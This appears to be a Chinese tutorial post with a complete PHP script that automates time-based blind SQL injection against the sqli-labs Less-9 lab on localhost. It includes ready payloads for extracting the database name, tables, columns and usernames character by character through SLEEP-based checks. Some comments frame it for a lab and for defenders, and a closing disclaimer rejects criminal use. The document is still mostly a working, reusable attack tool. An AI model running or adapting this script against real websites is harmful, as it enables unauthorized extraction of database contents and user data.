数据库自动盲注代码
<?php
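/**
 * Minimal cURL wrapper used by the script below: a GET with an optional query
 * string, or a POST with $params as the body.
 *
 * @param string             $url    Target URL.
 * @param string|array|false $params Query string for GET (appended after '?'),
 *                                   or the POST body. A falsy value means "no
 *                                   query string" for GET.
 * @param int|bool           $ispost Truthy sends a POST, otherwise GET.
 * @return string|false Response body (CURLOPT_RETURNTRANSFER), or false when
 *                      curl_exec() reports a transport error or timeout.
 */
function juhecurl($url, $params = false, $ispost = 0)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36');
    // Both timeouts are 30 s; a request that hangs longer yields false below.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    if ($ispost) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
        curl_setopt($ch, CURLOPT_URL, $url);
    } elseif ($params) {
        // Truthiness test kept for compatibility: a query string such as '0'
        // is treated as absent, exactly as in the original.
        curl_setopt($ch, CURLOPT_URL, $url . '?' . $params);
    } else {
        curl_setopt($ch, CURLOPT_URL, $url);
    }

    $response = curl_exec($ch);

    // Fix: the original returned early on failure without closing the handle,
    // leaking it on PHP < 8 (curl_close is a no-op from 8.0 on). Closing
    // unconditionally also drops the dead curl_getinfo() calls whose results
    // were never used.
    curl_close($ch);

    return $response;
}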
//爆数据库
//$_Payload = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -";
//爆表
//$_Payload = "1' and if((ASCII((substr((select group_concat(table_name) from information_schema.`TABLES` where TABLE_schema=0x7365637572697479),%d,1))) = %d),sleep(2),'2')-- -";
//爆字段
//$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_schema=0x7365637572697479 and table_name=0x7573657273
),%d,1))) = %d),sleep(2),'2')-- -";
//爆数据
// Driver for the time-based blind oracle against the local sqli-labs Less-9 lab below.
// The two %d placeholders are the character position (1..40) and the candidate ASCII
// code (32..127); the injected if() makes the database sleep(2) only when the guess is
// right, so the only signal is response latency -- nothing is read from the response
// body ($res is never used).
// From a defender's view: the GROUP_CONCAT(...) / sleep(...) tokens inside the id
// parameter, sent up to 96 times per character position, are the signature an access-log
// review or WAF rule would key on; parameterised queries remove the injection itself.
$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(username) from `security`.users ),%d,1))) = %d),sleep(2),'2')-- -";
// Target is a deliberately vulnerable lab on the loopback address.
$url = 'http://127.0.0.1/SQLInj/sqli-labs/Less-9/';
// Outer loop: character position 1..40 of the extracted value.
for($i=1;$i<=40;$i++){
// Inner loop: each printable ASCII code in turn; stops at the first one that delays.
for($a=32;$a<=127;$a++){
$payload = sprintf($_Payload,$i,$a);
// Sent as a GET query string via juhecurl(..., $ispost = 0).
$b = "id=".urlencode($payload);
// time() has one-second resolution, so the ">1" check is coarse: any response that is
// slow for an unrelated reason (network, server load) also passes and prints a wrong
// character.
$begin_time=time();
$res = juhecurl($url,$b,0);
$end_time=time() - $begin_time;
if ($end_time>1){
// Match for this position. If no candidate ever matches, nothing is printed for the
// position and the outer loop simply continues.
echo chr($a);
break;
}
}
}
?>
爆数据库
//$_Payload = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -";
爆表
//$_Payload = "1' and if((ASCII((substr((select group_concat(table_name) from information_schema.`TABLES` where TABLE_schema=0x7365637572697479),%d,1))) = %d),sleep(2),'2')-- -";
爆字段
//$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_schema=0x7365637572697479 and table_name=0x7573657273
),%d,1))) = %d),sleep(2),'2')-- -";
爆数据
$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(username) from `security`.users ),%d,1))) = %d),sleep(2),'2')-- -";
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护